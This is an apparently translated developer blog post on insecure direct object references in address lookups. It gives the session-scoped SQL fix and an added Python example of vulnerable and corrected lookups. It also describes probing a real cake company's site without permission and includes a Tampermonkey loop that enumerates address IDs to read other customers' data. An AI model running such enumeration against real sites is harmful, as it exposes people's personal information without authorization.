Last year, the company took on a large nanshan order. Because there was no completely similar project to refer to, I had to fumble through it on my own: a version would be built, it would not feel right, and it would be adjusted and modified; then new features had to be developed. One person could not keep up at that time, which was a real headache. To make the work more convenient I simply camped out at the client's site, developing and discussing solutions, and I came home at midnight every day.

While new functions were being developed, the old layout was also being adjusted, and there were bugs to be fixed. The workload was too much for one person and the client required fast progress, so many details were ignored, which also left hidden security risks. The work lasted about three months, and finally the development was finished. I was very happy that a project was finally done. But at this point the customer brought in a professional tester who specialized in testing systems for vulnerabilities, and the trouble sown earlier surfaced: 7 or 8 vulnerabilities were found, including in online payment, customer information security, etc.

    select top 1 * from addr where id = 'id';

However, if a user casually modifies the ID in a GET request on the website, the information of other customers may be obtained, and other customers' information may be seriously disclosed. Suppose the GET address is /user/deliveryAddress/55 and the user enters /user/deliveryAddress/56. The correct way is to obtain the user ID from the current login session and check it together with the address ID, so that nothing goes wrong:

    select top 1 * from addr where id = 'id' and userid = 'userid';

A few days ago, it was revealed that a cake company's cakes were not made fresh on the day, and that its internal management was a mess. I had also bought a cake from them before, so I was curious and went to their official website to have a look.

I accidentally found that when a user modifies address information, the site fetches that information in the same way I did before: /user/deliveryAddress/ID. As an IT person, I made this mistake before. Out of curiosity, I changed an address ID at random. As expected, the address information changed and I saw the information of other users. Later, to verify, I wrote a loop in Tampermonkey:

    // ==UserScript==
    // @name         XFXB
    // @namespace
    // @version      0.1
    // @description  try to take over the world!
    // @author       You
    // @match        *
    // @require
    // @grant        none
    // ==/UserScript==

    (function() {
        'use strict';
        for (var i = 1000; i < 1005; i++) {
            $.get("/user/deliveryAddress/" + i, function(result) {
                console.log(result);
            });
        }
        // Your code here...
    })();

The following information appears

It’s easy to get access to other users’ addresses, and it looks like everyone else is making the same mistake.
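The session-scoped lookup described earlier in this post, set beside the ID-only lookup, as an added example that is not code from the original project. It assumes an in-memory SQLite table shaped like `addr` (so `LIMIT 1` stands in for `top 1`), constructed sample rows, and a hypothetical `handle_get` handler and `session` dict.

```python
import sqlite3

def make_db():
    """Constructed sample data: two customers, one address each."""
    db = sqlite3.connect(":memory:")
    db.row_factory = sqlite3.Row
    db.execute("CREATE TABLE addr (id INTEGER PRIMARY KEY, userid INTEGER, detail TEXT)")
    db.executemany("INSERT INTO addr VALUES (?, ?, ?)",
                   [(55, 1, "Alice, 1 Example Rd"), (56, 2, "Bob, 2 Sample St")])
    return db

def get_address_vulnerable(db, addr_id):
    # Original pattern: the row is selected by the ID from the URL alone.
    return db.execute("SELECT * FROM addr WHERE id = ? LIMIT 1",
                      (addr_id,)).fetchone()

def get_address_scoped(db, session_userid, addr_id):
    # Corrected pattern: the owner comes from the login session,
    # never from anything the client sends.
    return db.execute("SELECT * FROM addr WHERE id = ? AND userid = ? LIMIT 1",
                      (addr_id, session_userid)).fetchone()

def handle_get(db, session, path):
    """Hypothetical handler for GET /user/deliveryAddress/<id>.

    Returns (status, body).
    """
    if "userid" not in session:
        return 401, None
    try:
        addr_id = int(path.rsplit("/", 1)[-1])
    except ValueError:
        return 400, None
    row = get_address_scoped(db, session["userid"], addr_id)
    # One 404 covers both "no such address" and "someone else's address",
    # so the response does not reveal which IDs exist.
    return (200, row["detail"]) if row else (404, None)

if __name__ == "__main__":
    db = make_db()
    alice = {"userid": 1}  # constructed session for user 1
    print(get_address_vulnerable(db, 56)["detail"])           # other user's row
    print(handle_get(db, alice, "/user/deliveryAddress/55"))  # own address
    print(handle_get(db, alice, "/user/deliveryAddress/56"))  # refused
```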

@IT of a cake website: your bug should be fixed. I am recording the potholes I have stepped in, hoping that others will step in the same potholes less often and can find solutions on CNBLOGS.